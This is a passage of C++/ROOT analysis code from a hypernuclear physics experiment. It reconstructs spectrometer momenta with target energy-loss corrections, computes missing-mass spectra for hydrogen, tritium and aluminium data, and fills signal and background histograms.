holiang = par_ep[2] + hrs_ang;
holiang=-holiang;
delta_pep[0] = 6.23409e-3 * holiang + 4.03363e-1;
}
pep_real[0] = momL[0] + delta_pep[0]/1000.0; //LHRS momentum at the reaction point in GeV
par_ep[0] = pep_real[0];
// RHRS angle and momentum calculation
th1[0] = calcf2t_th(Theta_R, R_XFP, R_XpFP, R_YFP, R_YpFP, z_av[0]);
th1[0] = th1[0]*Xptr + Xptm;
ph1[0] = calcf2t_ph(PHI_R, R_XFP, R_XpFP, R_YFP, R_YpFP, z_av[0]);
ph1[0] = ph1[0]*Yptr + Yptm;
momR[0] = calcf2t_mom(mom_R, R_XFP, R_XpFP, R_YFP, R_YpFP, z_av[0]);
momR[0] = momR[0]*Momr+Momm;
par_k[1] = -th1[0]; /// DEc4 2019 2 lines
par_k[2] = -ph1[0];
double holiang1;
// target struggling step #11
if(z_av_1[0]<8.0e-2){
holiang1= par_k[2] - hrs_ang;
delta_pk[0] =-1.31749 * sin(-4.61513* holiang1) + 2.03687;
}
else{
holiang1= par_k[2] - hrs_ang;
delta_pk[0] = 3.158e-2 * holiang1 + 4.05819e-1;
}
pk_real[0] = momR[0] + delta_pk[0]/1000.0; // kaon momentum at the reaction point
par_k[0] = pk_real[0];
// missing mass calculation==============================
hallap = hallap - 0.1843 ;// must be -ve
hallap = hallap/1000.0; // MeV-->GeV
mm = CalcMM(hallap, par_ep, par_k, mp);
mm = (mm)*1000.; // MeV--->GeV
h->Fill(mm);
XFP = XFP * XFPr + XFPm;
XpFP = XpFP * XpFPr + XpFPm;
YFP = YFP * YFPr + YFPm;
YpFP = YpFP * YpFPr + YpFPm;
R_XFP = R_XFP*XFPr +XFPm ;
R_XpFP = R_XpFP*XpFPr+XpFPm;
R_YFP = R_YFP*YFPr+ YFPm;
R_YpFP = R_YpFP*YpFPr +YpFPm;
z_av[0] =z_av[0]*Ztr + Ztm;
tnew->Fill();
bool lambdaflag=false;
int peak_with_hit= -1;
for(int j=0; j<npeak; j++){
if(Lambda_cent[j]-Lambda_width[j]<mm
&&mm < Lambda_cent[j]+Lambda_width[j]){
lambdaflag=true;
peak_with_hit=j;
h_1 ->Fill(mm);
h_1 ->SetLineColor(j+2);
}
else lambdaflag=false;
if(ntune_event<nmax && lambdaflag==true){
foil_flag[ntune_event] = peak_with_hit;
p10[ntune_event] = par_ep[0];
p11[ntune_event] = par_ep[1];
p12[ntune_event] = par_ep[2];
p13[ntune_event] = par_k[0];
p14[ntune_event] = par_k[1];
p15[ntune_event] = par_k[2];
p16[ntune_event] = hallap;
x[ntune_event] = R_XFP; ////RHRS open these lines only when RHRS mom matrix is tuning
y[ntune_event] = R_YFP;
xp[ntune_event] = R_XpFP;
yp[ntune_event] = R_YpFP;
// x[ntune_event] = XFP; ////LHRS open these line only when LHRS mom matrix is tuning
// y[ntune_event] = YFP;
// xp[ntune_event] = XpFP;
// yp[ntune_event] = YpFP;
z_recon[ntune_event] = z_av_1[0];
phir[ntune_event] =ph1[0];
phil[ntune_event] =ph2[0];
ntune_event++;
}
}//int j
}
}
tnew->Write();
// ((((((((((((((((((((((((((((((((((((((((( t2 ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
for (int i=0 ; i< ent_2 ; i++){
for(int j=0 ; j<max ; j++){
l_x_fp_2[j] = -2222.0;
l_th_fp_2[j] = -2222.0;
l_y_fp_2[j] = -2222.0;
l_ph_fp_2[j] = -2222.0;
th1_2[j] = -2222.0;
th2_2[j] = -2222.0;
ph1_2[j] =-2222.0;
ph2_2[j] =-2222.0;
delta_pep_2[j]= -2222.0;
pep_real_2[j] =-2222.0;
delta_pk_2[j]= -2222.0;
pk_real_2[j] = -2222.0;
delta_ht_pep_2[j]= -2222.0; //May 01, 2021
pep_ht_real_2[j] =-2222.0;
delta_ht_pk_2[j]= -2222.0;
pk_ht_real_2[j] = -2222.0;
r_x_fp_2[j] = -2222.0;
r_th_fp_2[j] = -2222.0;
r_y_fp_2[j] = -2222.0;
r_ph_fp_2[j] = -2222.0;
trig5_2[j] = 0.0;
rtrig_2 = false;
}
trig5_2[0] = 0.0;
rtrig_2 = false;
t2->GetEntry(i);
if(trig5_2[0]>1.0) rtrig_2 = true; //JUly 01, 2019
else rtrig_2 = false;
z_av_2[0] = (lvz_2[0] + rvz_2[0])/2.0;
z_av_1_2[0] = z_av_2[0];
z_av_ht_2[0] = z_av_2[0];
XFP_2 = l_x_fp_2[0];
XpFP_2 = l_th_fp_2[0];
YFP_2 = l_y_fp_2[0];
YpFP_2 = l_ph_fp_2[0];
R_XFP_2 = r_x_fp_2[0];
R_XpFP_2 = r_th_fp_2[0];
R_YFP_2 = r_y_fp_2[0];
R_YpFP_2 = r_ph_fp_2[0];
XFP_2 = (XFP_2-XFPm)/XFPr;
XpFP_2 = (XpFP_2-XpFPm)/XpFPr;
YFP_2 = (YFP_2-YFPm)/YFPr;
YpFP_2 = (YpFP_2-YpFPm)/YpFPr;
R_XFP_2 = (R_XFP_2-XFPm)/XFPr;
R_XpFP_2 = (R_XpFP_2-XpFPm)/XpFPr;
R_YFP_2 = (R_YFP_2-YFPm)/YFPr;
R_YpFP_2 = (R_YpFP_2-YpFPm)/YpFPr;
/// ================= for Al event in tune ==== jan 07, 2020
XFP_4 = XFP_2;
XpFP_4 = XpFP_2;
YFP_4 = YFP_2;
YpFP_4 = YpFP_2;
R_XFP_4 =R_XFP_2;
R_XpFP_4 = R_XpFP_2;
R_YFP_4 =R_YFP_2;
R_YpFP_4 =R_YpFP_2;
z_av_2[0] =(z_av_2[0]- Ztm)/Ztr;
th2_2[0] = calcf2t_th(Theta_L, XFP_2, XpFP_2, YFP_2, YpFP_2, z_av_1_2[0]);
th2_2[0] = th2_2[0]*Xptr + Xptm;
ph2_2[0] = calcf2t_ph(PHI_L, XFP_2, XpFP_2, YFP_2, YpFP_2, z_av_1_2[0] );
ph2_2[0] = ph2_2[0]*Yptr + Yptm;
momL_2[0] = calcf2t_mom(mom_L, XFP_2, XpFP_2, YFP_2, YpFP_2, z_av_2[0]);
momL_2[0] =momL_2[0]*Momr + Momm;
momL_2[0] = momL_2[0]*2.217925/2.10; // Original for H/T and tritium only
par_ep_2[1] = -th2_2[0]; // Dec4, 2019
par_ep_2[2] = -ph2_2[0];
///// From here is the energy struggling for the H data in the T kinematics======LHRS===**************************
par_ht_ep_2[1] = -th2_2[0]; //May 01, 2021
par_ht_ep_2[2] = -ph2_2[0];
double holiang2_ht;
// Target struggling LHRS step #7
if( z_av_ht_2[0]<8.0e-2){
holiang2_ht = par_ht_ep_2[2] + hrs_ang;
holiang2_ht = - holiang2_ht;
delta_ht_pep_2[0] = -1.35758*sin(-4.59571* holiang2_ht) + 2.09093;
}
else{
holiang2_ht = par_ht_ep_2[2] + hrs_ang;
holiang2_ht = - holiang2_ht;
delta_ht_pep_2[0] = 6.23409e-3* holiang2_ht + 4.03363e-1;
}
pep_ht_real_2[0] = momL_2[0] + delta_ht_pep_2[0]/1000.0; //LHRS momentum at the reaction point in GeV
par_ht_ep_2[0] = pep_ht_real_2[0] ;
///// Upto here is the energy struggling for the H data in the T kinematics======LHRS==**************************
///// From here is the energy struggling for the Al data in the H/T kinematics==========******* LHRS ***************
double holiang2;
// Target struggling LHRS step #7
if( z_av_1_2[0]<8.0e-2){
holiang2 = par_ep_2[2] + hrs_ang;
holiang2 = - holiang2;
delta_pep_2[0] = -1.35758*sin(-4.59571* holiang2) + 2.09093;
delta_pep_2[0] = delta_pep_2[0] + 0.063; //May 07 2021***************************
}
else{
holiang2 = par_ep_2[2] + hrs_ang;
holiang2 = - holiang2;
// delta_pep_2[0] = 6.23409e-3* holiang2 + 4.03363e-1;
delta_pep_2[0] = 0.3004; //May 07 2021************************************
}
pep_real_2[0] = momL_2[0] + delta_pep_2[0]/1000.0; //LHRS momentum at the reaction point in GeV
par_ep_2[0] = pep_real_2[0] ;
///// upto here is the energy struggling for the Al data in the T kinematics=====LHRS =====**************************
// RHRS angle and momentum calculation
th1_2[0] = calcf2t_th(Theta_R, R_XFP_2, R_XpFP_2, R_YFP_2, R_YpFP_2, z_av_2[0]);
th1_2[0] = th1_2[0]*Xptr + Xptm;
ph1_2[0] = calcf2t_ph(PHI_R, R_XFP_2, R_XpFP_2, R_YFP_2, R_YpFP_2, z_av_2[0]);
ph1_2[0] = ph1_2[0]*Yptr + Yptm;
momR_2[0] = calcf2t_mom(mom_R, R_XFP_2, R_XpFP_2, R_YFP_2, R_YpFP_2, z_av_2[0]);
momR_2[0] = momR_2[0]*Momr+Momm;
par_k_2[1] = -th1_2[0]; // Dec2, 2019
par_k_2[2] = -ph1_2[0];
///// From here is the energy struggling for the H data in the T kinematics for RHRS=====**************************
par_ht_k_2[1] = -th1_2[0]; // May 01, 2021
par_ht_k_2[2] = -ph1_2[0];
double holiang3_ht;
// target struggling step #11
if(z_av_ht_2[0]<8.0e-2){
holiang3_ht = par_ht_k_2[2] - hrs_ang;
holiang3_ht = holiang3_ht;
delta_ht_pk_2[0] =-1.31749*sin(-4.61513*holiang3_ht) + 2.03687;
}
else{
holiang3_ht = par_ht_k_2[2] - hrs_ang;
holiang3_ht = holiang3_ht;
delta_ht_pk_2[0] = 3.158e-2*holiang3_ht + 4.05819e-1;
}
pk_ht_real_2[0] = momR_2[0] + delta_ht_pk_2[0]/1000.0; // kaon momentum at the reaction point
par_ht_k_2[0] = pk_ht_real_2[0];
hallap_ht_2 = hallap_2-0.1843 ;// must be -ve for the H data in the tritium kinematics
hallap_ht_2 = hallap_ht_2/1000.0; // MeV-->GeV
// missing mass calculation==============================
mm_2 = CalcMM(hallap_ht_2, par_ht_ep_2, par_ht_k_2, mp);
mm_2 = (mm_2)*1000.; // MeV--->GeV
mmT_T = CalcMM(hallap_ht_2, par_ht_ep_2, par_ht_k_2, m_T);// to analyze H/T and considering H mass as tritium mass
mmT_T = (mmT_T)*1000.; // MeV--->GeV // m_T is the tritium target
mmT_T = mmT_T - 2994.814;
///// Upto here is the energy struggling for the H data in the T kinematics for RHRS=====**************************
///// From here is the energy struggling for the Al data in the H/T kinematics for RHRS=====**************************
double holiang3;
// target struggling step #11
if(z_av_1_2[0]<8.0e-2){
holiang3 = par_k_2[2] - hrs_ang;
holiang3 = holiang3;
delta_pk_2[0] =-1.31749*sin(-4.61513*holiang3) + 2.03687;
delta_pk_2[0] =delta_pk_2[0] + 0.0627;//May 07 2021************************************
}
else{
holiang3 = par_k_2[2] - hrs_ang;
holiang3 = holiang3;
// delta_pk_2[0] = 3.158e-2*holiang3 + 4.05819e-1;
delta_pk_2[0] = 0.2962;//May 07 2021************************************
}
pk_real_2[0] = momR_2[0] + delta_pk_2[0]/1000.0; // kaon momentum at the reaction point
par_k_2[0] = pk_real_2[0];
// missing mass calculation==============================
if(z_av_1_2[0]<8.0e-2){ //May 07 2021************************************
hallap_2 = hallap_2 - 0.1175;
}
else{
hallap_2 = hallap_2 - 0.2257;//May 07 2021************************************
}
hallap_2 = hallap_2/1000.0; // MeV-->GeV
mm_4 = CalcMM(hallap_2, par_ep_2, par_k_2, m_Al);
mm_4 = (mm_4)*1000.0;
mm_ht = mm_4 - 25.3123*1000;
//// MAy 17, 2021.... Now adjusting the Al entrance and Exit window.
bool HTflag = false;
if(rtrig_2==true && fabs(ctime_2)<1.0 && fabs(lvz_2[0]-rvz_2[0])<0.04){ // Oct 28 2020 closed the ct 0.04 is original
HTflag = true;
}
else HTflag = false;
if(HTflag == true && fabs(z_av_1_2[0])<0.10){
h_2->Fill(mm_2);
XFP_2 = XFP_2 * XFPr + XFPm;
XpFP_2 = XpFP_2 * XpFPr + XpFPm;
YFP_2 = YFP_2 * YFPr + YFPm;
YpFP_2 = YpFP_2 * YpFPr + YpFPm;
R_XFP_2 = R_XFP_2*XFPr +XFPm ;
R_XpFP_2 = R_XpFP_2*XpFPr+XpFPm;
R_YFP_2 = R_YFP_2*YFPr+ YFPm;
R_YpFP_2 = R_YpFP_2*YpFPr +YpFPm;
z_av_2[0] =z_av_2[0]*Ztr + Ztm;
tnew->Fill();
bool lambdaflag_2=false;
int peak_with_hit_2= -1;
for(int j=0; j<npeak_2; j++){
if(Lambda_cent_2[j]-Lambda_width_2[j]<mm_2
&&mm_2 < Lambda_cent_2[j]+Lambda_width_2[j]){
lambdaflag_2=true;
peak_with_hit_2=j;
}
else lambdaflag_2=false;
if(ntune_event_2<nmax_2 && lambdaflag_2==true){
foil_flag_2[ntune_event_2] = peak_with_hit_2;
p10_2[ntune_event_2] = par_ht_ep_2[0]; /// for H data in T kinematics
p11_2[ntune_event_2] = par_ht_ep_2[1]; // ht added on may 05, 2021
p12_2[ntune_event_2] = par_ht_ep_2[2];
p13_2[ntune_event_2] = par_ht_k_2[0];
p14_2[ntune_event_2] = par_ht_k_2[1];
p15_2[ntune_event_2] = par_ht_k_2[2];
p16_2[ntune_event_2] = hallap_ht_2; // may 05
x_2[ntune_event_2] = R_XFP_2; ////RHRS open these line only when RHRS mom matrix is tuning
y_2[ntune_event_2] = R_YFP_2;
xp_2[ntune_event_2] = R_XpFP_2;
yp_2[ntune_event_2] = R_YpFP_2;
// x_2[ntune_event_2] = XFP_2; ////LHRS open these line only when LHRS mom matrix is tuning
// y_2[ntune_event_2] = YFP_2;
// xp_2[ntune_event_2] = XpFP_2;
// yp_2[ntune_event_2] = YpFP_2;
z_recon_2[ntune_event_2] = z_av_1_2[0];
phir_2[ntune_event_2] =ph1_2[0];
phil_2[ntune_event_2] =ph2_2[0];
ntune_event_2++;
}
}//int j
}
/// ==================== to include the Al/HT evenys for tune========== jan 07 2020
bool htflag1 = false;
if(rtrig_2==true && fabs(ctime_2)<1.0 && fabs(lvz_2[0]-rvz_2[0])<0.040){
htflag1 = true;
}
else htflag1 = false;
bool HTallflag = false;
if(a1_2<120.0 && a2_2>1650.0 && a2_2<6800.0 && //for entrance and exit aluminum caps
((z_av_1_2[0] > -0.14 && z_av_1_2[0]< -0.11) || (z_av_1_2[0] > 0.11 && z_av_1_2[0]< 0.14))){
HTallflag = true;
}
else HTallflag = false;
///// AL background analysis
bool hbgflag = false;
if(rtrig_2==true &&((ctime_2>-49.39 && ctime_2 < -9.06)||(ctime_2>13.18 && ctime_2 < 48.6))&& fabs(lvz_2[0]-rvz_2[0])<0.040){
hbgflag = true;
}
else hbgflag = false;
if(HTallflag == true && hbgflag == true)
{
hb-> Fill(mm_ht);
hbal_15_1-> Fill(mm_ht); // c/0.15
hb5-> Fill(mm_ht);
hb_al1-> Fill(mm_ht); // c/0.25
hbal_20_1-> Fill(mm_ht); // c/0.2
}
///// Real spectrum
if(htflag1 == true && HTallflag == true/* && (mm_ht> -5.0 && mm_ht <-1.0) ||(mm_ht> 19.5 && mm_ht <32.4))*/){ //plot spectrum
h21->Fill(mm_ht);
hh->Fill(mm_ht);
hal_15_1->Fill(mm_ht); // NOV 30, 2020// counts /0.15 MeV
he->Fill(mm_ht);
h_al1->Fill(mm_ht); // NOV 16, 2020// counts /0.25 MeV
hal_20_1->Fill(mm_ht); // NOV 30, 2020// counts /0.2 MeV
XFP_4 = XFP_4 * XFPr + XFPm;
XpFP_4 = XpFP_4 * XpFPr + XpFPm;
YFP_4 = YFP_4 * YFPr + YFPm;
YpFP_4 = YpFP_4 * YpFPr + YpFPm;
R_XFP_4 = R_XFP_4*XFPr +XFPm ;
R_XpFP_4 = R_XpFP_4*XpFPr+XpFPm;
R_YFP_4 = R_YFP_4*YFPr+ YFPm;
R_YpFP_4 = R_YpFP_4*YpFPr +YpFPm;
tnew->Fill();
bool lambdaflag_4=false;
int peak_with_hit_4= -1;
for(int j=0; j<npeak_4; j++){
if(Lambda_cent_4[j]-Lambda_width_4[j]<mm_ht
&&mm_ht < Lambda_cent_4[j]+Lambda_width_4[j]){
lambdaflag_4=true;
peak_with_hit_4=j;
}
else lambdaflag_4=false;
if(ntune_event_4<nmax_4 && lambdaflag_4==true){
foil_flag_4[ntune_event_4] = peak_with_hit_4;
p10_4[ntune_event_4] = par_ep_2[0]; // right side should be _2 // for Al data
p11_4[ntune_event_4] = par_ep_2[1];
p12_4[ntune_event_4] = par_ep_2[2];
p13_4[ntune_event_4] = par_k_2[0];
p14_4[ntune_event_4] = par_k_2[1];
p15_4[ntune_event_4] = par_k_2[2];
p16_4[ntune_event_4] = hallap_2;
x_4[ntune_event_4] = R_XFP_4; ////RHRS open these lines only when RHRS mom matrix is tuning
y_4[ntune_event_4] = R_YFP_4;
xp_4[ntune_event_4] = R_XpFP_4;
yp_4[ntune_event_4] = R_YpFP_4;
// x_4[ntune_event_4] = XFP_4; ////LHRS open these lines only when LHRS mom matrix is tuning
// y_4[ntune_event_4] = YFP_4;
// xp_4[ntune_event_4] = XpFP_4;
// yp_4[ntune_event_4] = YpFP_4;
z_recon_4[ntune_event_4] = z_av_1_2[0];
phir_4[ntune_event_4] =ph1_2[0];
phil_4[ntune_event_4] =ph2_2[0];
ntune_event_4++;
}
}
}// j=0; j< npeak_4
}
tnew->Write();
// ))))))))))))))))))))))))))))))))))))))))) t2 ))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
// ((((((((((((((((((((((((((((((((((((((((( t3 ((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
bool rtrig_3 = false;
for(int i=0; i<nmax_3; i++){
x_3[i] = -2222.0;
y_3[i] = -2222.0;
xp_3[i] = -2222.0;
yp_3[i] = -2222.0;
z_av_3[i] = -2222.0;
z_av_1_3[i] = -2222.0;
phir_3[i] = -2222.0;
phil_3[i] = -2222.0;
z_recon_3[i] = -2222.0; //// Jan 04, 2019
foil_flag_3[i] = -1;
}
// ///////////////////////////////////////////////////////////////////////////////////
for (int i=0 ; i< ent_3 ; i++){
for(int j=0 ; j<max ; j++){
l_x_fp_3[j] = -2222.0;
l_th_fp_3[j] = -2222.0;
l_y_fp_3[j] = -2222.0;
l_ph_fp_3[j] = -2222.0;
th1_3[j] = -2222.0;
th2_3[j] = -2222.0;
ph1_3[j] =-2222.0;
ph2_3[j] =-2222.0;
delta_pep_3[j]= -2222.0;
pep_real_3[j] =-2222.0;
delta_pk_3[j]= -2222.0;
pk_real_3[j] = -2222.0;
delta_tt_pep_3[j]= -2222.0; // May 01, 2021
pep_tt_real_3[j] =-2222.0;
delta_tt_pk_3[j]= -2222.0;
pk_tt_real_3[j] = -2222.0;
r_x_fp_3[j] = -2222.0;
r_th_fp_3[j] = -2222.0;
r_y_fp_3[j] = -2222.0;
r_ph_fp_3[j] = -2222.0;
trig5_3[j] = 0.0;
rtrig_3 = false;
}
trig5_3[0] = 0.0;
rtrig_3 = false;
t3->GetEntry(i);
if(trig5_3[0]>1.0) rtrig_3 = true; //JUly 01, 2019
else rtrig_3 = false;
z_av_3[0] = (lvz_3[0] + rvz_3[0])/2.0;
z_av_1_3[0] = z_av_3[0];
z_av_tt_3[0] = z_av_3[0];
XFP_3 = l_x_fp_3[0];
XpFP_3 = l_th_fp_3[0];
YFP_3 = l_y_fp_3[0];
YpFP_3 = l_ph_fp_3[0];
R_XFP_3 = r_x_fp_3[0];
R_XpFP_3 = r_th_fp_3[0];
R_YFP_3 = r_y_fp_3[0];
R_YpFP_3 = r_ph_fp_3[0];
XFP_3 = (XFP_3-XFPm)/XFPr;
XpFP_3 = (XpFP_3-XpFPm)/XpFPr;
YFP_3 = (YFP_3-YFPm)/YFPr;
YpFP_3 = (YpFP_3-YpFPm)/YpFPr;
R_XFP_3 = (R_XFP_3-XFPm)/XFPr;
R_XpFP_3 = (R_XpFP_3-XpFPm)/XpFPr;
R_YFP_3 = (R_YFP_3-YFPm)/YFPr;
R_YpFP_3 = (R_YpFP_3-YpFPm)/YpFPr;
z_av_3[0] =(z_av_3[0]- Ztm)/Ztr;
th2_3[0] = calcf2t_th(Theta_L, XFP_3, XpFP_3, YFP_3, YpFP_3, z_av_1_3[0]);
th2_3[0] = th2_3[0]*Xptr + Xptm;
ph2_3[0] = calcf2t_ph(PHI_L, XFP_3, XpFP_3, YFP_3, YpFP_3, z_av_1_3[0] );
ph2_3[0] = ph2_3[0]*Yptr + Yptm;
momL_3[0] = calcf2t_mom(mom_L, XFP_3, XpFP_3, YFP_3, YpFP_3, z_av_3[0]);
momL_3[0] =momL_3[0]*Momr + Momm;
momL_3[0] = momL_3[0]*2.217925/2.10; // Original for H/T and tritium only
par_ep_3[1] = -th2_3[0]; // Dec4, 2019
par_ep_3[2] = -ph2_3[0];
/// May 01, 2021, ************************* from here "seperate target struggling for NNL" ***********========================
/// making the different variable to store the variable to calculate the NNL spectrum.====LHRS =========================
par_tt_ep_3[1] = -th2_3[0]; // May 01, 2021
par_tt_ep_3[2] = -ph2_3[0];
double holiang5_tt;
// Target struggling LHRS step #7...... MAy 01, 2021
if( z_av_tt_3[0]<8.0e-2){
holiang5_tt = par_tt_ep_3[2] + hrs_ang;
holiang5_tt = - holiang5_tt;
delta_tt_pep_3[0] = -1.35758*sin(-4.59571* holiang5_tt) + 2.09093;
}
else{
holiang5_tt = par_tt_ep_3[2] + hrs_ang;
holiang5_tt = - holiang5_tt;
delta_tt_pep_3[0] = 6.23409e-3* holiang5_tt + 4.03363e-1;
}
pep_tt_real_3[0] = momL_3[0] + delta_tt_pep_3[0]/1000.0; //LHRS momentum at the reaction point in GeV
par_tt_ep_3[0] = pep_tt_real_3[0] ;
/// May 01, 2021, ************************* upto here "seperate target struggling for NNL" ***********======================
///// The following are the target energy struggling for the Al (T/T) target====LHRS =======================
double holiang5;
if( z_av_1_3[0]<8.0e-2){
holiang5 = par_ep_3[2] + hrs_ang;
holiang5 = - holiang5;
delta_pep_3[0] = -1.35758*sin(-4.59571* holiang5) + 2.09093;
delta_pep_3[0] = delta_pep_3[0] + 0.0524; //May 03, 2021********************************************
}
else{
holiang5 = par_ep_3[2] + hrs_ang;
holiang5 = - holiang5;
// delta_pep_3[0] = 6.23409e-3* holiang5 + 4.03363e-1;
delta_pep_3[0] = 0.3027; //May 07, 2021********************************************
}
pep_real_3[0] = momL_3[0] + delta_pep_3[0]/1000.0; //LHRS momentum at the reaction point in GeV
par_ep_3[0] = pep_real_3[0] ;
///// up to here is the target energy struggling for the Al target===LHRS =========================
// RHRS angle and momentum calculation
th1_3[0] = calcf2t_th(Theta_R, R_XFP_3, R_XpFP_3, R_YFP_3, R_YpFP_3, z_av_3[0]);
th1_3[0] = th1_3[0]*Xptr + Xptm;
ph1_3[0] = calcf2t_ph(PHI_R, R_XFP_3, R_XpFP_3, R_YFP_3, R_YpFP_3, z_av_3[0]);
ph1_3[0] = ph1_3[0]*Yptr + Yptm;
momR_3[0] = calcf2t_mom(mom_R, R_XFP_3, R_XpFP_3, R_YFP_3, R_YpFP_3, z_av_3[0]);
momR_3[0] = momR_3[0]*Momr+Momm;
par_k_3[1] = -th1_3[0]; // Dec2, 2019
par_k_3[2] = -ph1_3[0];
/// May 01, 2021, ************************* from here "seperate target struggling for NNL" ***********=====================
/// making the different variable to store the variable to calculate the NNL spectrum.==RHRS ================================
par_tt_k_3[1] = -th1_3[0]; // May 01, 2021
par_tt_k_3[2] = -ph1_3[0];
double holiang6_tt;
// target struggling step #11
if(z_av_tt_3[0]<8.0e-2){
holiang6_tt = par_tt_k_3[2] - hrs_ang;
holiang6_tt = holiang6_tt;
delta_tt_pk_3[0] =-1.31749*sin(-4.61513*holiang6_tt) + 2.03687;
}
else{
holiang6_tt = par_tt_k_3[2] - hrs_ang;
holiang6_tt = holiang6_tt;
delta_tt_pk_3[0] = 3.158e-2*holiang6_tt + 4.05819e-1;
}
pk_tt_real_3[0] = momR_3[0] + delta_tt_pk_3[0]/1000.0; // kaon momentum at the reaction point
par_tt_k_3[0] = pk_tt_real_3[0];
/// May 01, 2021, ************************* upto here "seperate target struggling for NNL" ***********===============
//// Now MM calculation for the Lnn spectrum===========================================================
hallap_tt_3 = hallap_3-0.1843 ;// must be -ve
hallap_tt_3 = hallap_tt_3/1000.0; // MeV-->GeV
mm_h = CalcMM(hallap_tt_3, par_tt_ep_3, par_tt_k_3, mp); //// to see hydrogen in tritium data
mm_h = (mm_h)*1000.;
mm_h = mm_h -1115.683;
mm_3 = CalcMM(hallap_tt_3, par_tt_ep_3, par_tt_k_3, m_T);
mm_3 = (mm_3)*1000.; // GeV--->MeV
mm_t = mm_3 -2994.814; // for tritium target only By TOSHI when consider the tritium mass (recoil mass)
//// up to here is MM calculation for the Lnn spectrum===========================================================
//// The following is target eenrgy struggling and 27_Mg_L calculation===RHRS===Al target(T/T)=========
double holiang6;
// target struggling step #11
if(z_av_1_3[0]<8.0e-2){
holiang6 = par_k_3[2] - hrs_ang;
holiang6 = holiang6;
delta_pk_3[0] =-1.31749*sin(-4.61513*holiang6) + 2.03687;
delta_pk_3[0] = delta_pk_3[0] + 0.0512;//May 07, 2021********************************************
}
else{
holiang6 = par_k_3[2] - hrs_ang;
holiang6 = holiang6;
// delta_pk_3[0] = 3.158e-2*holiang6 + 4.05819e-1;
delta_pk_3[0] = 0.2993;//May 07, 2021********************************************
}
pk_real_3[0] = momR_3[0] + delta_pk_3[0]/1000.0; // kaon momentum at the reaction point
par_k_3[0] = pk_real_3[0];
// missing mass calculation====Al data ==========================
// hallap_3 = hallap_3-0.1843 ;// must be -ve
if(z_av_1_3[0]<8.0e-2){
hallap_3 = hallap_3 - 0.1065;//May 07, 2021********************************************
}
else{
hallap_3 = hallap_3 - 0.2318;//May 07, 2021********************************************
}
hallap_3 = hallap_3/1000.0; // MeV-->GeV
mm_Al = CalcMM(hallap_3, par_ep_3, par_k_3, m_Al);
mm_Al = (mm_Al)*1000.0;
mm_Al1 = mm_Al -25.3123*1000; // for Al Al kinematics only. when consider Al as target
/////+++++++++++++++++++++++++++++++++++===========================- aerogel hist for thesis sept 04, 2020++++++++++++++++
//// ========================= from here is tritium data analysis ==============+++++++++++++++++++++++++++++++++++++++++++++
bool Tritium_flag = false;
if(rtrig_3==true && fabs(lvz_3[0]-rvz_3[0])< 0.053 &&
a1_3<180.0 && a2_3>1550.0 && a2_3<8000.0 && fabs(z_av_1_3[0])<0.10){//chnged Jan 11 2020
Tritium_flag = true;
}
else Tritium_flag = false;
//// for nnl real analysis
if(Tritium_flag == true && fabs(ctime_3)<1.0){ //to plot real nnL spectrum
h50->Fill(mm_t); // For nnL spectrum
h25_2->Fill(mm_t);
// H contamination +++++++++++++++++++++++++++++
h_h->Fill(mm_h); // H Contamination with 1.5 MeV/bin
h_hc0->Fill(mm_h);
h_hc1->Fill(mm_h);
h1_2->Fill(mm_t); // nnL spectrum
///&&&&&&&&&&&&&&&&&&&&&%%%%%%%%%%%%%%%%%%%%%%%%%%%%$$$$$$$$# DEC 01, 2020%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
h150_1->Fill(mm_t);
h150_2->Fill(mm_t);
h150_3->Fill(mm_t);
h150_4->Fill(mm_t);
h150_5->Fill(mm_t);
h150_6->Fill(mm_t);
h125_1->Fill(mm_t);
h125_2->Fill(mm_t);
h125_3->Fill(mm_t);
h125_4->Fill(mm_t);
h125_5->Fill(mm_t);
h125_6->Fill(mm_t);
h1_qu->Fill(mm_t);
h1_q1->Fill(mm_t);
h1_0->Fill(mm_t);
h1_01->Fill(mm_t);
h1_02->Fill(mm_t);
h1_03->Fill(mm_t);
h1_04->Fill(mm_t);
h1_05->Fill(mm_t);
h1_may->Fill(mm_t);
}
//// for nnl backkground analysis
bool bg_nnlflag = false;
if((ctime_3>-49.39 && ctime_3 < -9.06)||(ctime_3> 13.18 && ctime_3 < 48.6)){//chnged Jan 11 2020
bg_nnlflag = true;
}
else bg_nnlflag = false;
if(Tritium_flag == true && bg_nnlflag ==true){
h25_2b->Fill(mm_t);
h50b->Fill(mm_t);
// background for H contamination ++++++++++++++++++++++++
h1_2b->Fill(mm_t);
h_hbg->Fill(mm_h); // bg in H contamination
h_hc0b->Fill(mm_h);
h_hc1b->Fill(mm_h);
h1_01b->Fill(mm_t);
h1_03b->Fill(mm_t);
h1_05b->Fill(mm_t);
h125_6b->Fill(mm_t);
h125_4b->Fill(mm_t);
h125_5b->Fill(mm_t);
h125_3b->Fill(mm_t);
h1b_may->Fill(mm_t);
h150_1b->Fill(mm_t);
h150_2b->Fill(mm_t);
h1_qub->Fill(mm_t);
h1_qb1->Fill(mm_t);
h1_02b->Fill(mm_t);
}
////// ========================= upt o here is tritium data analysis ==============+++++++++++++++++++++++++++++++++++++++++++++
// //// ========================= from here is Al data analysis ==============+++++++++++++++++++++++++++++++++++++++++++++
////// for tune a1 nd a2 = 120 1650, 6800& 0.04 and to see the spectrum a1 , a2 = 160, 1585, 8000 & 0.5
bool TTallflag = false;
if(rtrig_3==true && fabs(lvz_3[0]-rvz_3[0])<0.040 && a1_3<120.0
&& a2_3>1650.0 && a2_3<6800.0 &&
((z_av_1_3[0]>-0.14 && z_av_1_3[0]<-0.11) || (z_av_1_3[0]>0.11 && z_av_1_3[0]<0.14))){//for entrance and exit aluminum caps
TTallflag = true;
}
else TTallflag = false;
///// for Al background analysis ======================================================================
bool bg1_flag = false;
if((ctime_3> -49.39 && ctime_3 < -9.06) ||(ctime_3> 13.18 && ctime_3 < 48.6)){
bg1_flag = true;
}
else bg1_flag = false;
if(TTallflag == true && bg1_flag == true)
{
hb1->Fill(mm_Al1);
hb6->Fill(mm_Al1);
h21_b->Fill(mm_Al1);
hb_al2->Fill(mm_Al1); // count/0.25
hbal_20_2->Fill(mm_Al1);// count/0.2
hbal_15_2->Fill(mm_Al1);// count/0.15
}
/// real spectrum AL
if(TTallflag == true && fabs(ctime_3) < 1.0 /*&&((mm_Al1 > -5.3 &&mm_Al1<-1.1)||(mm_Al1 >19.5 &&mm_Al1<32.4))*/){//plot Al spectrum
h20->Fill(mm_Al1);
